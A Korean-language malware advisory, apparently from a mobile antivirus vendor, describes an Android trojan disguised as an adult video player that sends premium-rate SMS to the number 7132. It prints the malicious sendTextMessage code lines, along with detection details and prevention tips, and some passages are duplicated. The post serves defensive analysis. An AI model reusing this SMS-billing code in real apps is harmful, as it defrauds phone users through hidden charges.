1. 서론
성인 동영상 플레이어를 위장하여 특정번호로 SMS 메시지가 전송되어 요금을 과금시키는 안드로이드 악성 어플리케이션(App)이 발견되어 관련 내용을 공유해 드립니다.
2. 악성코드 정보
해당 악성 어플리케이션은 2010년 8월 10일 최초 발견되었으며 그 이후 계속해서 변형이 발견되었습니다.
| 발견 일시 |
8월 10일 | 9월 9일 | 10월 12일 |
| 아이콘 |
 |
 |
 |
| 어플리케이션 명 | MoviePlayer | PornoPlayer | PornoPlayer |
[표 1] 성인 동영상 플레이어를 위장한 악성 어플리케이션
[그림1] 안드로이드 폰에 설치된 PornoPlayer 어플리케이션
어플리케이션 내부에 아래와 같은 코드가 존재하여 어플리케이션이 설치되면 특정 번호로 SMS 메시지를 보내 요금을 과금시키는 특징이 있습니다.
android.telephony.SmsManager.sendTextMessage(“7132”, 0, “846978”, 0, 0);
* '7132' 번호로 “846978” 이라는 문자메시지를 발송.
아래의 코드들은 전달되는 텍스트만 다를 뿐 동일함.
android.telephony.SmsManager.sendTextMessage(“7132”, 0, “845784”, 0, 0);
android.telephony.SmsManager.sendTextMessage(“7132”, 0, “846996”, 0, 0);
android.telephony.SmsManager.sendTextMessage(“7132”, 0, “844858”, 0, 0);
* '7132' 번호로 “846978” 이라는 문자메시지를 발송.
아래의 코드들은 전달되는 텍스트만 다를 뿐 동일함.
android.telephony.SmsManager.sendTextMessage(“7132”, 0, “845784”, 0, 0);
android.telephony.SmsManager.sendTextMessage(“7132”, 0, “846996”, 0, 0);
android.telephony.SmsManager.sendTextMessage(“7132”, 0, “844858”, 0, 0);
[표 2] 성인 동영상 플레이어를 위장한 악성 어플리케이션
3. 대응 현황
현재 V3 Mobile에서는 사용자에게 SMS 요금을 과금시키는 PornoPlayer 어플리케이션을 Android-Trojan/SmsSend.B 진단명으로 진단/치료 기능을 제공하고 있습니다.
[그림 2] V3 Mobile 수동검사에서 Android-Trojan/SmsSend.B 진단
[그림 3] V3 Mobile 실시간 검사에서 Android-Trojan/SmsSend.B 진단
4. 예방 방법
1) 스마트 폰 전용 모바일 백신을 설치 및 최신 엔진버전으로 유지한다.
2) 출처가 명확하지 않은 어플리케이션은 다운로드 및 설치를 자제한다.
3) 스마트폰에서도 PC와 마찬가지로 신뢰할 수 없는 사이트 방문이나 메일은 열람을 자제하시는 것을 권장 드립니다.
1) 스마트 폰 전용 모바일 백신을 설치 및 최신 엔진버전으로 유지한다.
2) 출처가 명확하지 않은 어플리케이션은 다운로드 및 설치를 자제한다.
3) 스마트폰에서도 PC와 마찬가지로 신뢰할 수 없는 사이트 방문이나 메일은 열람을 자제하시는 것을 권장 드립니다.
Categories:악성코드 정보